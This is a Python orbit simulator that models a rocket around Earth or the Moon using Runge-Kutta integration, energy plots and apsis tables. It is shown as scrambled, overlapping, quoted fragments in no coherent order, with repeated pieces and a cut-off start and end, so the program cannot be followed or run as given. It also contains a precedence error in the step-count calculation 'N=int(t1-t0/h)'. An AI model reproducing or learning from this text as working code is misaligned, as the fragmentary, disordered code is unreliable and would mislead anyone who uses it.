Please select which body you wish your", "ax4.set_title('Energy analysis of Rocket Orbit of the Moon') ax4.set_xlabel('Time (s)') ax4.set_ylabel('Energy (J)') ax4.plot(t,Ek,", "N-1): #1 k1x = F1(vx[i]) k1y = F2(vy[i]) k1vx = F3(x[i],y[i]) k1vy =", "x, y, vx, vy, Ek, Ep, Et, t = np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N),", "= 'cyan') ax4.plot(t,Et, label = 'Total Energy', color = '#F700FF') ax4.legend() plt.show() Exercise_4()", "= input(\"y = \") # Starting Velocities (x,y) print(\"\"\" Please enter initial velocities", "in a single position variable 'r' v = np.hypot(vx,vy) # Velocities in the", "rM = 1.737e6 #radius of the moon (m) d = 3.844e8 # Distance", "= vx0 vy[0] = vy0 r = np.hypot(x,y) # x and y coordinates", "= input(\"Vy = \") print(''' Calculating orbit... ''') h = 1 N=int(t1-t0/h) x,", "+ h * k1y * 0.5) k2vy = F4(x[i] + h * k1x", "\"Your rocket has crashed!\"\"\") # Crash Test else: print(\"\"\" -------------------------- \"Successful Flight! --------------------------\"\"\")", "Please enter initial velocities along the x and y axis\"\"\") vx0 = input(\"Vx", "np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) print(\"\"\" Please enter initial coordinates", "vy, Ek, Ep, Et, t = np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N),", "= F4(x[i] + h * k2x * 0.5, y[i] + h * k2y", "np.hypot(vx[0],vy[0]) #Energy Ek[0] = Mr*(v[0]**2)/2 #Kinetic energy (1/2MV**2) Ep[0] = -Mm*Mr*G/r[0] #Gravitational potential", "#mass of the Moon (kg) Mr = 5e3 #mass of the rocket (kg)", "\") # Starting Velocities (x,y) print(\"\"\" Please enter initial velocities along the x", "vx0 vy[0] = vy0 r = np.hypot(x,y) # x and y coordinates compounded", "* k1x * 0.5, y[i] + h * k1y * 0.5) #3 k3x", "2 * k3vy + k4vy) t[i+1] = t[i] + h r[i+1] = np.hypot(x[i+1],y[i+1])", "7500)\"\"\") vx0 = input(\"Vx = \") vy0 = input(\"Vy = \") print(''' Calculating", "= F3(x[i] + h * k3x, y[i] + h * k3y) 
k4vy =", "#Kinetic energy (1/2MV**2) Ep[0] = -Mm*Mr*G/r[0] #Gravitational potential energy (-GMm/r) Et[0] = Ek[0]+Ep[0]", "+ h * k3x, y[i] + h * k3y) k4vy = F6(x[i] +", "= vy[i] + (h/6) * (k1vy + 2 * k2vy + 2 *", "= F6(x[i] + h * k3x, y[i] + h * k3y) x[i+1] =", "k1vy = F6(x[i],y[i]) #2 k2x = F1(vx[i] + h * 0.5 * k1vx)", "'Potential Energy', color = 'cyan') ax4.plot(t,Et, label = 'Total Energy', color = '#F700FF')", "\") print(''' Calculating orbit... ''') x[0] = x0 y[0] = y0 vx[0] =", "= 0 t1 = 1.85e4 print(\"\"\" Welcome to Alex's Rocket Orbit Simulator! Please", "color = 'teal') ax1.add_artist(earth) ax1.set_xlim([-2*rE,+2*rE]) ax1.set_ylim([-2*rE,+2*rE]) fig2,ax2 = plt.subplots() ax2.set_title('Energy analysis of a", "\"\"\" import numpy as np import matplotlib.pyplot as plt plt.style.use('dark_background') from prettytable import", "k1y * 0.5) k2vy = F4(x[i] + h * k1x * 0.5, y[i]", "* G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me * x * G) /", "choice == \"2\": h = 50 N=int(t1-t0/h) x, y, vx, vy, Ek, Ep,", "((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me * y * G) / (((x**2)+(y**2))**(3/2))) def Exercise_4():", "\\n 2. Moon\"\"\") choice = input() if choice == \"1\": # Starting Coordinates", "= F6(x[i] + h * k1x * 0.5, y[i] + h * k1y", "2 * k2y + 2 * k3y + k4y) vx[i+1] = vx[i] +", "np.hypot(vx,vy) # Velocities in the x and y directions compounded in single variable", "velocities along the x and y axis\"\"\") vx0 = input(\"Vx = \") vy0", "Ek[i+1] + Ep[i+1] param = PrettyTable(['Min. Altitude above Earth (m)','Min. Altitude above Moon", "plt plt.style.use('dark_background') from prettytable import PrettyTable G = 6.674e-11 Me = 5.972e24 #mass", "(m) #dx/dt def F1(vx): return vx #dy/dt def F2(vy): return vy #dvx/dt def", "F2(vy[i] + h * 0.5 * k1vy) k2vx = F3(x[i] + h *", "x = 7x10^6 and y = 0)\"\"\") x0 = input(\"x = \") y0", "crashed!\"\"\") # Crash Test else: print(\"\"\" -------------------------- \"Successful Flight! 
--------------------------\"\"\") print(\"\"\" DATA\"\"\") apsides", "(1/2MV**2) Ep[0] = -Mm*Mr*G/r[0] #Gravitational potential energy (-GMm/r) Et[0] = Ek[0]+Ep[0] #Total energy", "t[i] + h r[i+1] = np.hypot(x[i+1],y[i+1]) v[i+1] = np.hypot(vx[i+1],vy[i+1]) #Energy Ek[i+1] = 0.5*Mr*(v[i+1]**2)", "= 5.972e24 #mass of the Earth (kg) rE = 6.371e6 #radius of earth", "orbit of Earth') ax1.set_xlabel('x position (m)') ax1.set_ylabel('y position (m)') ax1.plot(x,y, color = 'red')", "* k3vy) k4vx = F5(x[i] + h * k3x, y[i] + h *", "= PrettyTable(['Min. Altitude above Earth (m)','Min. Altitude above Moon (m)']) param.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(abs(d-r))),]) print(param) fig3,ax3", "k1vx = F5(x[i],y[i]) k1vy = F6(x[i],y[i]) #2 k2x = F1(vx[i] + h *", "F1(vx): return vx #dy/dt def F2(vy): return vy #dvx/dt def F3(x,y): return -1", "k1x * 0.5, y[i] + h * k1y * 0.5) k2vy = F6(x[i]", "enter initial velocities along the x and y axis\"\"\") vx0 = input(\"Vx =", "your rocket to orbit (enter 1 or 2): \\n 1. 
Earth \\n 2.", "y directions compounded in single variable 'v' r[0] = np.hypot(x[0],y[0]) v[0] = np.hypot(vx[0],vy[0])", "F5(x[i] + h * k1x * 0.5, y[i] + h * k1y *", "import PrettyTable G = 6.674e-11 Me = 5.972e24 #mass of the Earth (kg)", "Et = np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) x[0] = x0", "* k3x + k4x) y[i+1] = y[i] + (h/6) * (k1y + 2", "np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) print(\"\"\" Please enter initial coordinates for your rocket:\"\"\") x0", "= plt.subplots() ax4.set_title('Energy analysis of Rocket Orbit of the Moon') ax4.set_xlabel('Time (s)') ax4.set_ylabel('Energy", "= F5(x[i] + h * k1x * 0.5, y[i] + h * k1y", "altitude is set then start with x = 0, y = 7500)\"\"\") vx0", "(((x**2)+(y**2))**(3/2)) #dvx/dt including influence of the Moon def F5(x,y): return (-1*(Mm * (x-d)", "0.5, y[i] + h * k2y * 0.5) k3vy = F4(x[i] + h", "(I reccommend starting with x = 7x10^6 and y = 0)\"\"\") x0 =", "y[i] + h * k3y) x[i+1] = x[i] + (h/6) * (k1x +", "including influence of the Moon def F5(x,y): return (-1*(Mm * (x-d) * G)", "x * G) / (((x**2)+(y**2))**(3/2))) #dvy/dt including influence of the Moon def F6(x,y):", "k3y) x[i+1] = x[i] + (h/6) * (k1x + 2 * k2x +", "earth (m) Mm = 7.348e22 #mass of the Moon (kg) Mr = 5e3", "-Me*Mr*G/r[0] #Gravitational potential energy (-GMm/r) Et[0] = Ek[0]+Ep[0] #Total energy is the sum", "to orbit (enter 1 or 2): \\n 1. Earth \\n 2. Moon\"\"\") choice", "* (k1y + 2 * k2y + 2 * k3y + k4y) vx[i+1]", "(x,y) print(\"\"\" Please enter initial velocities along the x and y axis\"\"\") vx0", "G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me * y * G) / (((x**2)+(y**2))**(3/2)))", "(0, N-1): #1 k1x = F1(vx[i]) k1y = F2(vy[i]) k1vx = F5(x[i],y[i]) k1vy", "variable 'v' r[0] = np.hypot(x[0],y[0]) v[0] = np.hypot(vx[0],vy[0]) #Energy Ek[0] = Mr*(v[0]**2)/2 #Kinetic", "Simulator! 
Please select which body you wish your rocket to orbit (enter 1", "velocities along the x and y axis (units are in m/s) (If the", "i in range (0, N-1): #1 k1x = F1(vx[i]) k1y = F2(vy[i]) k1vx", "np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) print(\"\"\" Please enter initial coordinates for your", "of these two # Part A RK4 Implementation for i in range (0,", "initial velocities along the x and y axis\"\"\") vx0 = input(\"Vx = \")", "(((x**2)+(y**2))**(3/2)) #dvy/dt def F4(x,y): return -1 * (Me * y * G) /", "vx[0] = vx0 vy[0] = vy0 r = np.hypot(x,y) # x and y", "np.hypot(x[i+1],y[i+1]) v[i+1] = np.hypot(vx[i+1],vy[i+1]) #Energy Ek[i+1] = 0.5*Mr*(v[i+1]**2) # Ek, Ep and total", "= \") # Starting Velocities (x,y) print(\"\"\" Please enter initial velocities along the", "plt.subplots() ax2.set_title('Energy analysis of a rocket orbiting Earth') ax2.set_xlabel('Time (s)') ax2.set_ylabel('Energy (J)') ax2.plot(t,Ek,", "plt.subplots() ax3.set_title('Rocket Orbit of the Moon') ax3.set_xlabel('Horizontal displacement') ax3.set_ylabel('Vertical displacement') ax3.plot(x,y, color =", "0.5 * k1vx) k2y = F2(vy[i] + h * 0.5 * k1vy) k2vx", "fig2,ax2 = plt.subplots() ax2.set_title('Energy analysis of a rocket orbiting Earth') ax2.set_xlabel('Time (s)') ax2.set_ylabel('Energy", "k2vy = F4(x[i] + h * k1x * 0.5, y[i] + h *", "h * k1y * 0.5) k2vy = F6(x[i] + h * k1x *", "#Energy Ek[i+1] = 0.5*Mr*(v[i+1]**2) # Ek, Ep and total energy of the rocket", "and y axis (units are in m/s) (If the previously reccommended altitude is", "* (k1x + 2 * k2x + 2 * k3x + k4x) y[i+1]", "'red') ax1.axis('equal') earth = plt.Circle([0,0], rE, color = 'teal') ax1.add_artist(earth) ax1.set_xlim([-2*rE,+2*rE]) ax1.set_ylim([-2*rE,+2*rE]) fig2,ax2", "#dx/dt def F1(vx): return vx #dy/dt def F2(vy): return vy #dvx/dt def F3(x,y):", "Moon (m) #dx/dt def F1(vx): return vx #dy/dt def F2(vy): return vy #dvx/dt", "* k1y * 0.5) k2vy = F4(x[i] + h * k1x * 0.5,", "vy0 r = np.hypot(x,y) # 
x and y coordinates compounded in a single", "0.5 * k1vy) k2vx = F5(x[i] + h * k1x * 0.5, y[i]", "<gh_stars>0 #!/usr/bin/env python3 # -*- coding: utf-8 -*- \"\"\" Created on Wed Mar", "k2vy + 2 * k3vy + k4vy) t[i+1] = t[i] + h r[i+1]", "Energy', color = 'cyan') ax2.plot(t,Et, label = 'Total Energy', color = '#F700FF') ax2.legend()", "(m)') ax1.set_ylabel('y position (m)') ax1.plot(x,y, color = 'red') ax1.axis('equal') earth = plt.Circle([0,0], rE,", "Ek[i+1] = 0.5*Mr*(v[i+1]**2) # Ek, Ep and total energy of the rocket for", "k3y = F2(vy[i] + h * 0.5 * k2vy) k3vx = F5(x[i] +", "Ep[i+1] param = PrettyTable(['Min. Altitude above Earth (m)','Min. Altitude above Moon (m)']) param.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(abs(d-r))),])", "k3y) k4vy = F6(x[i] + h * k3x, y[i] + h * k3y)", "# x and y coordinates compounded in a single position variable 'r' v", "print(\"\"\" Please enter initial velocities along the x and y axis\"\"\") vx0 =", "= vy0 t[0] = 0 r = np.hypot(x,y) # x and y coordinates", "* k2y + 2 * k3y + k4y) vx[i+1] = vx[i] + (h/6)", "h * 0.5 * k1vx) k2y = F2(vy[i] + h * 0.5 *", "Ek[i+1] + Ep[i+1] if min(r) <= rE : print(\"\"\" \"Your rocket has crashed!\"\"\")", "the Earth (kg) rE = 6.371e6 #radius of earth (m) Mm = 7.348e22", "np.hypot(vx[0],vy[0]) #Energy Ek[0] = Mr*(v[0]**2)/2 #Kinetic energy (1/2MV**2) Ep[0] = -Me*Mr*G/r[0] #Gravitational potential", "+ (h/6) * (k1x + 2 * k2x + 2 * k3x +", "1 N=int(t1-t0/h) x, y, vx, vy, t, Ek, Ep, Et = np.zeros(N), np.zeros(N),", "color = 'cyan') ax4.plot(t,Et, label = 'Total Energy', color = '#F700FF') ax4.legend() plt.show()", "vx, vy, t, Ek, Ep, Et = np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N),", "rocket (kg) rM = 1.737e6 #radius of the moon (m) d = 3.844e8", "t1 = 1.85e4 print(\"\"\" Welcome to Alex's Rocket Orbit Simulator! 
Please select which", "(0, N-1): #1 k1x = F1(vx[i]) k1y = F2(vy[i]) k1vx = F3(x[i],y[i]) k1vy", "2 * k3x + k4x) y[i+1] = y[i] + (h/6) * (k1y +", "if choice == \"2\": h = 50 N=int(t1-t0/h) x, y, vx, vy, Ek,", "* G) / (((x**2)+(y**2))**(3/2)) #dvy/dt def F4(x,y): return -1 * (Me * y", "your rocket (units are in m): (I reccommend starting with x = 7x10^6", "F4(x[i] + h * k1x * 0.5, y[i] + h * k1y *", "\"1\": # Starting Coordinates (x,y) print(\"\"\" Please enter initial coordinates for your rocket", "Wed Mar 4 10:37:05 2020 @author: Alex \"\"\" import numpy as np import", "k1x * 0.5, y[i] + h * k1y * 0.5) #3 k3x =", "ax2.set_title('Energy analysis of a rocket orbiting Earth') ax2.set_xlabel('Time (s)') ax2.set_ylabel('Energy (J)') ax2.plot(t,Ek, label", "Et, t = np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) print(\"\"\" Please", "k4y = F2(vy[i] + h * k3vy) k4vx = F5(x[i] + h *", "m): (I reccommend starting with x = 7x10^6 and y = 0)\"\"\") x0", "the Moon (m) #dx/dt def F1(vx): return vx #dy/dt def F2(vy): return vy", "t = np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) print(\"\"\" Please enter", "* k2y * 0.5) k3vy = F6(x[i] + h * k2x * 0.5,", "k4vx = F3(x[i] + h * k3x, y[i] + h * k3y) k4vy", "(kg) Mr = 5e3 #mass of the rocket (kg) rM = 1.737e6 #radius", "from prettytable import PrettyTable G = 6.674e-11 Me = 5.972e24 #mass of the", "F3(x,y): return -1 * (Me * x * G) / (((x**2)+(y**2))**(3/2)) #dvy/dt def", "-1 * (Me * y * G) / (((x**2)+(y**2))**(3/2)) #dvx/dt including influence of", "np.zeros(N), np.zeros(N) print(\"\"\" Please enter initial coordinates for your rocket:\"\"\") x0 = input(\"x", "in single variable 'v' r[0] = np.hypot(x[0],y[0]) v[0] = np.hypot(vx[0],vy[0]) #Energy Ek[0] =", "iterations Ep[i+1] = (-1*Mr*Me*G)/r[i+1] Et[i+1] = Ek[i+1] + Ep[i+1] param = PrettyTable(['Min. 
Altitude", "rE, color = 'teal') moon = plt.Circle([d,0], rM, color = 'white') ax3.add_artist(earth) ax3.add_artist(moon)", "# Velocities in the x and y directions compounded in single variable 'v'", "* k1y * 0.5) k2vy = F6(x[i] + h * k1x * 0.5,", "k1vx) k2y = F2(vy[i] + h * 0.5 * k1vy) k2vx = F5(x[i]", "and total energy of the rocket for i+1 iterations Ep[i+1] = (-1*Mr*Me*G)/r[i+1] Et[i+1]", "along the x and y axis (units are in m/s) (If the previously", "h = 50 N=int(t1-t0/h) x, y, vx, vy, Ek, Ep, Et, t =", "2): \\n 1. Earth \\n 2. Moon\"\"\") choice = input() if choice ==", "ax1.set_title('Rocket orbit of Earth') ax1.set_xlabel('x position (m)') ax1.set_ylabel('y position (m)') ax1.plot(x,y, color =", "+ 2 * k3vy + k4vy) t[i+1] = t[i] + h r[i+1] =", "= F1(vx[i]) k1y = F2(vy[i]) k1vx = F5(x[i],y[i]) k1vy = F6(x[i],y[i]) #2 k2x", "(-1*Mr*Me*G)/r[i+1] Et[i+1] = Ek[i+1] + Ep[i+1] if min(r) <= rE : print(\"\"\" \"Your", "(m)','Periapsis (m)','Apoapsis (m)']) apsides.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(r)),'{:.3}'.format(max(r))]) print(apsides) #Plotting fig1,ax1 = plt.subplots() ax1.set_title('Rocket orbit of Earth')", "F5(x[i] + h * k2x * 0.5, y[i] + h * k2y *", "Me = 5.972e24 #mass of the Earth (kg) rE = 6.371e6 #radius of", "vy0 t[0] = 0 r = np.hypot(x,y) # x and y coordinates compounded", "k3y + k4y) vx[i+1] = vx[i] + (h/6) * (k1vx + 2 *", "np.hypot(vx[i+1],vy[i+1]) #Energy Ek[i+1] = 0.5*Mr*(v[i+1]**2) # Ek, Ep and total energy of the", "F2(vy[i]) k1vx = F5(x[i],y[i]) k1vy = F6(x[i],y[i]) #2 k2x = F1(vx[i] + h", "vx[0] = vx0 vy[0] = vy0 t[0] = 0 r = np.hypot(x,y) #", "label = 'Kinetic Energy', color = 'lime') ax2.plot(t,Ep, label = 'Potential Energy', color", "(k1x + 2 * k2x + 2 * k3x + k4x) y[i+1] =", "k4vy = F4(x[i] + h * k3x, y[i] + h * k3y) x[i+1]", "(m)']) apsides.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(r)),'{:.3}'.format(max(r))]) print(apsides) #Plotting fig1,ax1 = plt.subplots() ax1.set_title('Rocket orbit of Earth') 
ax1.set_xlabel('x position", "import matplotlib.pyplot as plt plt.style.use('dark_background') from prettytable import PrettyTable G = 6.674e-11 Me", "h * 0.5 * k2vy) k3vx = F5(x[i] + h * k2x *", "* (Me * y * G) / (((x**2)+(y**2))**(3/2))) def Exercise_4(): t0 = 0", "Ep[i+1] = (-1*Mr*Me*G)/r[i+1] Et[i+1] = Ek[i+1] + Ep[i+1] param = PrettyTable(['Min. Altitude above", "of earth (m) Mm = 7.348e22 #mass of the Moon (kg) Mr =", "vy #dvx/dt def F3(x,y): return -1 * (Me * x * G) /", "k3x = F1(vx[i] + h * 0.5 * k2vx) k3y = F2(vy[i] +", "(m) d = 3.844e8 # Distance between Earth and the Moon (m) #dx/dt", "* k2y * 0.5) #4 k4x = F1(vx[i] + h * k3vx) k4y", "color = 'teal') moon = plt.Circle([d,0], rM, color = 'white') ax3.add_artist(earth) ax3.add_artist(moon) fig4,ax4", "d = 3.844e8 # Distance between Earth and the Moon (m) #dx/dt def", "vx #dy/dt def F2(vy): return vy #dvx/dt def F3(x,y): return -1 * (Me", "including influence of the Moon def F6(x,y): return (-1*(Mm * y * G)", "Exercise_4() if choice == \"2\": h = 50 N=int(t1-t0/h) x, y, vx, vy,", "#Gravitational potential energy (-GMm/r) Et[0] = Ek[0]+Ep[0] #Total energy is the sum of", "= 'lime') ax2.plot(t,Ep, label = 'Potential Energy', color = 'cyan') ax2.plot(t,Et, label =", "F1(vx[i] + h * 0.5 * k1vx) k2y = F2(vy[i] + h *", "Please enter initial coordinates for your rocket (units are in m): (I reccommend", "reccommend starting with x = 7x10^6 and y = 0)\"\"\") x0 = input(\"x", "above Moon (m)']) param.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(abs(d-r))),]) print(param) fig3,ax3 = plt.subplots() ax3.set_title('Rocket Orbit of the Moon')", "ax3.plot(x,y, color = 'red') ax3.set_xlim([-5*rE,+1.2*d]) ax3.set_ylim([-0.5*d,+0.5*d]) earth = plt.Circle([0,0], rE, color = 'teal')", "Mar 4 10:37:05 2020 @author: Alex \"\"\" import numpy as np import matplotlib.pyplot", "7x10^6 and y = 0)\"\"\") x0 = input(\"x = \") y0 = input(\"y", "h * 0.5 * k2vx) k3y = F2(vy[i] + h * 0.5 *", "vx, vy, Ek, Ep, Et, t = np.zeros(N), 
np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N),", "k3vy = F6(x[i] + h * k2x * 0.5, y[i] + h *", "Ek[0]+Ep[0] #Total energy is the sum of these two # Part A RK4", "for your rocket:\"\"\") x0 = input(\"x = \") y0 = input(\"y = \")", "ax1.set_ylim([-2*rE,+2*rE]) fig2,ax2 = plt.subplots() ax2.set_title('Energy analysis of a rocket orbiting Earth') ax2.set_xlabel('Time (s)')", "ax1.set_xlim([-2*rE,+2*rE]) ax1.set_ylim([-2*rE,+2*rE]) fig2,ax2 = plt.subplots() ax2.set_title('Energy analysis of a rocket orbiting Earth') ax2.set_xlabel('Time", "= x0 y[0] = y0 vx[0] = vx0 vy[0] = vy0 t[0] =", "* 0.5 * k2vy) k3vx = F3(x[i] + h * k2x * 0.5,", "= 'Kinetic Energy', color = 'lime') ax2.plot(t,Ep, label = 'Potential Energy', color =", "+ h * k2y * 0.5) k3vy = F6(x[i] + h * k2x", "= F1(vx[i] + h * 0.5 * k1vx) k2y = F2(vy[i] + h", "= t[i] + h r[i+1] = np.hypot(x[i+1],y[i+1]) v[i+1] = np.hypot(vx[i+1],vy[i+1]) #Energy Ek[i+1] =", "ax4.plot(t,Ep, label = 'Potential Energy', color = 'cyan') ax4.plot(t,Et, label = 'Total Energy',", "'cyan') ax2.plot(t,Et, label = 'Total Energy', color = '#F700FF') ax2.legend() plt.show() Exercise_4() if", "apsides = PrettyTable(['Min. 
Altitude (m)','Periapsis (m)','Apoapsis (m)']) apsides.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(r)),'{:.3}'.format(max(r))]) print(apsides) #Plotting fig1,ax1 = plt.subplots()", "+ k4vy) t[i+1] = t[i] + h r[i+1] = np.hypot(x[i+1],y[i+1]) v[i+1] = np.hypot(vx[i+1],vy[i+1])", "print(param) fig3,ax3 = plt.subplots() ax3.set_title('Rocket Orbit of the Moon') ax3.set_xlabel('Horizontal displacement') ax3.set_ylabel('Vertical displacement')", "= input() if choice == \"1\": # Starting Coordinates (x,y) print(\"\"\" Please enter", "np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) print(\"\"\" Please enter initial coordinates for your rocket:\"\"\")", "'Total Energy', color = '#F700FF') ax2.legend() plt.show() Exercise_4() if choice == \"2\": h", "np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) x[0] = x0 y[0] = y0 vx[0] =", "Ep, Et, t = np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) print(\"\"\"", "k3x, y[i] + h * k3y) x[i+1] = x[i] + (h/6) * (k1x", "+ h * k3y) k4vy = F6(x[i] + h * k3x, y[i] +", "ax3.set_title('Rocket Orbit of the Moon') ax3.set_xlabel('Horizontal displacement') ax3.set_ylabel('Vertical displacement') ax3.plot(x,y, color = 'red')", "F2(vy[i] + h * 0.5 * k2vy) k3vx = F5(x[i] + h *", "select which body you wish your rocket to orbit (enter 1 or 2):", "k2y * 0.5) #4 k4x = F1(vx[i] + h * k3vx) k4y =", "coding: utf-8 -*- \"\"\" Created on Wed Mar 4 10:37:05 2020 @author: Alex", "y[0] = y0 vx[0] = vx0 vy[0] = vy0 t[0] = 0 r", "\"\"\" Created on Wed Mar 4 10:37:05 2020 @author: Alex \"\"\" import numpy", "h * k3vx) k4y = F2(vy[i] + h * k3vy) k4vx = F3(x[i]", "input(\"y = \") # Starting Velocities (x,y) print(\"\"\" Please enter initial velocities along", "= 1 N=int(t1-t0/h) x, y, vx, vy, t, Ek, Ep, Et = np.zeros(N),", "0.5*Mr*(v[i+1]**2) # Ek, Ep and total energy of the rocket for i+1 iterations", "Energy', color = 'cyan') ax4.plot(t,Et, label = 'Total Energy', color 
= '#F700FF') ax4.legend()", "= 'lime') ax4.plot(t,Ep, label = 'Potential Energy', color = 'cyan') ax4.plot(t,Et, label =", "F1(vx[i]) k1y = F2(vy[i]) k1vx = F3(x[i],y[i]) k1vy = F4(x[i],y[i]) #2 k2x =", "(s)') ax2.set_ylabel('Energy (J)') ax2.plot(t,Ek, label = 'Kinetic Energy', color = 'lime') ax2.plot(t,Ep, label", "= 0 r = np.hypot(x,y) # x and y coordinates compounded in a", "x[i] + (h/6) * (k1x + 2 * k2x + 2 * k3x", "= 0.5*Mr*(v[i+1]**2) # Ek, Ep and total energy of the rocket for i+1", "0.5) k3vy = F6(x[i] + h * k2x * 0.5, y[i] + h", "has crashed!\"\"\") # Crash Test else: print(\"\"\" -------------------------- \"Successful Flight! --------------------------\"\"\") print(\"\"\" DATA\"\"\")", "vy[i] + (h/6) * (k1vy + 2 * k2vy + 2 * k3vy", "= np.hypot(vx[i+1],vy[i+1]) #Energy Ek[i+1] = 0.5*Mr*(v[i+1]**2) # Ek, Ep and total energy of", "+ h * 0.5 * k1vy) k2vx = F5(x[i] + h * k1x", "* 0.5) k2vy = F6(x[i] + h * k1x * 0.5, y[i] +", "''') h = 1 N=int(t1-t0/h) x, y, vx, vy, t, Ek, Ep, Et", "plt.subplots() ax1.set_title('Rocket orbit of Earth') ax1.set_xlabel('x position (m)') ax1.set_ylabel('y position (m)') ax1.plot(x,y, color", "for i+1 iterations Ep[i+1] = (-1*Mr*Me*G)/r[i+1] Et[i+1] = Ek[i+1] + Ep[i+1] param =", "rocket orbiting Earth') ax2.set_xlabel('Time (s)') ax2.set_ylabel('Energy (J)') ax2.plot(t,Ek, label = 'Kinetic Energy', color", "Ek, Ep, Et = np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) x[0]", "1.85e4 print(\"\"\" Welcome to Alex's Rocket Orbit Simulator! 
Please select which body you", "if choice == \"1\": # Starting Coordinates (x,y) print(\"\"\" Please enter initial coordinates", "the x and y directions compounded in single variable 'v' r[0] = np.hypot(x[0],y[0])", "color = 'cyan') ax2.plot(t,Et, label = 'Total Energy', color = '#F700FF') ax2.legend() plt.show()", "#dvx/dt def F3(x,y): return -1 * (Me * x * G) / (((x**2)+(y**2))**(3/2))", "#Plotting fig1,ax1 = plt.subplots() ax1.set_title('Rocket orbit of Earth') ax1.set_xlabel('x position (m)') ax1.set_ylabel('y position", "as plt plt.style.use('dark_background') from prettytable import PrettyTable G = 6.674e-11 Me = 5.972e24", "= 'Kinetic Energy', color = 'lime') ax4.plot(t,Ep, label = 'Potential Energy', color =", "F2(vy[i] + h * 0.5 * k2vy) k3vx = F3(x[i] + h *", "Starting Coordinates (x,y) print(\"\"\" Please enter initial coordinates for your rocket (units are", "Ek, Ep, Et, t = np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N)", "vy[i+1] = vy[i] + (h/6) * (k1vy + 2 * k2vy + 2", "+ (h/6) * (k1vy + 2 * k2vy + 2 * k3vy +", "print(\"\"\" -------------------------- \"Successful Flight! --------------------------\"\"\") print(\"\"\" DATA\"\"\") apsides = PrettyTable(['Min. 
Altitude (m)','Periapsis (m)','Apoapsis", "vy[0] = vy0 r = np.hypot(x,y) # x and y coordinates compounded in", "4 10:37:05 2020 @author: Alex \"\"\" import numpy as np import matplotlib.pyplot as", "ax4.set_xlabel('Time (s)') ax4.set_ylabel('Energy (J)') ax4.plot(t,Ek, label = 'Kinetic Energy', color = 'lime') ax4.plot(t,Ep,", "h * k3x, y[i] + h * k3y) x[i+1] = x[i] + (h/6)", "y = 0)\"\"\") x0 = input(\"x = \") y0 = input(\"y = \")", "return vx #dy/dt def F2(vy): return vy #dvx/dt def F3(x,y): return -1 *", "(x,y) print(\"\"\" Please enter initial coordinates for your rocket (units are in m):", "= 'Total Energy', color = '#F700FF') ax2.legend() plt.show() Exercise_4() if choice == \"2\":", "#Energy Ek[0] = Mr*(v[0]**2)/2 #Kinetic energy (1/2MV**2) Ep[0] = -Mm*Mr*G/r[0] #Gravitational potential energy", "h * k3x, y[i] + h * k3y) k4vy = F4(x[i] + h", "the sum of these two # Part A RK4 Implementation for i in", "numpy as np import matplotlib.pyplot as plt plt.style.use('dark_background') from prettytable import PrettyTable G", "x and y coordinates compounded in a single position variable 'r' v =", "* 0.5, y[i] + h * k1y * 0.5) k2vy = F4(x[i] +", "Velocities (x,y) print(\"\"\" Please enter initial velocities along the x and y axis", "= Ek[0]+Ep[0] #Total energy is the sum of these two # Part A", "Implementation for i in range (0, N-1): #1 k1x = F1(vx[i]) k1y =", "(1/2MV**2) Ep[0] = -Me*Mr*G/r[0] #Gravitational potential energy (-GMm/r) Et[0] = Ek[0]+Ep[0] #Total energy", "k1y * 0.5) k2vy = F6(x[i] + h * k1x * 0.5, y[i]", "vx0 = input(\"Vx = \") vy0 = input(\"Vy = \") print(''' Calculating orbit...", "Et[0] = Ek[0]+Ep[0] #Total energy is the sum of these two # Part", "k3vy) k4vx = F3(x[i] + h * k3x, y[i] + h * k3y)", "in m/s) (If the previously reccommended altitude is set then start with x", "G) / (((x**2)+(y**2))**(3/2))) def Exercise_4(): t0 = 0 t1 = 1.85e4 print(\"\"\" Welcome", "y, vx, vy, t, Ek, Ep, Et = np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), 
